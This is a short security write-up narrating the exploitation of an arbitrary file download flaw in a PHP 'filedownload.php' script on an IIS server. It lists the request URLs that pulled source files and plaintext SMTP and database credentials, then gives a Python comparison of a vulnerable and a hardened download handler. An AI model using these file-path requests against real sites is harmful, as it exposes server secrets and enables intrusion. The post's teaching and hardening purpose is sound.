"ERROR: download file NOT SPECIFIED. USE forcedownload.php?file=filepath"

The moment I saw that error I remembered it might be the old-school GHDB type of file download vulnerability, so now I had to check for two types of vulnerability:
1. LFI - Local File Inclusion
2. Source code disclosure

After some directory traversal attempts I was sure LFI was not applicable.

Then I looked for the web.config file, as the server was running on Windows IIS.
"http://site.com/filedownload.php?file=web.config": the link worked, but no luck, as the file was empty.


Then I looked for the "index.php" file, as many web developers put their database connection password in the "index" file: "http://site.com/filedownload.php?file=index.php". Luckily I was able to download the index file, but the password was not in it.


But I got a hint: a file named "UserUtils.php" was linked from "index.php".
So I started searching for "UserUtils.php" in all the paths I knew. After some hard work I located the file at "E:\netpub\vhosts\www\htdocs\UserUtils.php", full link:
"http://site.com/filedownload.php?file=E:\netpub\vhosts\www\htdocs\UserUtils.php"
and the file contained the SMTP server's administrator email ID, username, password etc...

 
But I was still not done: I had to find the database credentials. After reading the whole file I found a new path holding the configuration files "admin/include/config.php" and "admin/include/functions.php".

Now I tried to download the configuration file: "http://site.com/filedownload.php?file=admin/include/config.php"


And cheers, I was able to see the database credentials, as they were stored in plaintext.
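The handler above accepts whatever path the client supplies, absolute or relative. As an added example (mine, not the client's PHP), here is the same mistake in Python beside a hardened download handler that resolves the requested name against the document root and refuses anything that escapes it or is not a whitelisted document type. The document root, the two files in it (journal/welcome.pdf and admin/include/config.php, mirroring the post) and the allowed extensions are constructed for the example.

```python
import os
import tempfile
from pathlib import Path

ALLOWED_SUFFIXES = {".pdf", ".zip"}     # assumption: the download endpoint only ever served documents


def vulnerable_download(docroot, requested):
    """Mirrors the behaviour seen in the post: whatever path the client sends is opened.
    os.path.join discards docroot entirely when `requested` is absolute, and ../ sequences
    are never checked against docroot either."""
    with open(os.path.join(docroot, requested), "rb") as fh:
        return fh.read()


def safe_download(docroot, requested):
    """Hardened handler: resolve the candidate path, require it to stay under docroot,
    and reject anything that is not a plain file with an allowed extension."""
    root = Path(docroot).resolve()
    candidate = (root / requested).resolve()         # collapses ../ and follows symlinks
    try:
        candidate.relative_to(root)                  # ValueError if the path escaped docroot
    except ValueError:
        raise PermissionError("path escapes document root: %r" % requested) from None
    if candidate.suffix.lower() not in ALLOWED_SUFFIXES or not candidate.is_file():
        raise PermissionError("not a downloadable file: %r" % requested)
    return candidate.read_bytes()


def build_demo_site():
    """Constructed docroot with the two files from the post's story."""
    docroot = Path(tempfile.mkdtemp())
    (docroot / "journal").mkdir()
    (docroot / "journal" / "welcome.pdf").write_bytes(b"%PDF-1.4 demo")
    (docroot / "admin" / "include").mkdir(parents=True)
    (docroot / "admin" / "include" / "config.php").write_text("<?php $db_pass = 'hunter2';")
    return str(docroot)


def compare(docroot, requested):
    """(vulnerable outcome, hardened outcome) for one request, as short strings."""
    def attempt(handler):
        try:
            return handler(docroot, requested)[:24].decode()
        except OSError as err:                       # PermissionError and FileNotFoundError both land here
            return "blocked: " + type(err).__name__
    return attempt(vulnerable_download), attempt(safe_download)


if __name__ == "__main__":
    root = build_demo_site()
    for req in ("journal/welcome.pdf", "admin/include/config.php", "../../etc/passwd",
                os.path.join(root, "admin/include/config.php")):
        print("%-45s %s" % (req, compare(root, req)))
```

The absolute-path case is the one that let "E:\netpub\vhosts\www\htdocs\UserUtils.php" through in the post: joining a root with an absolute path yields the absolute path, so the root contributes nothing unless you check the resolved result afterwards.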

Video tutorial of a similar type of attack: https://www.youtube.com/watch?v=gjREfF5C4RQ

Thanks,


-Raghav Bisht
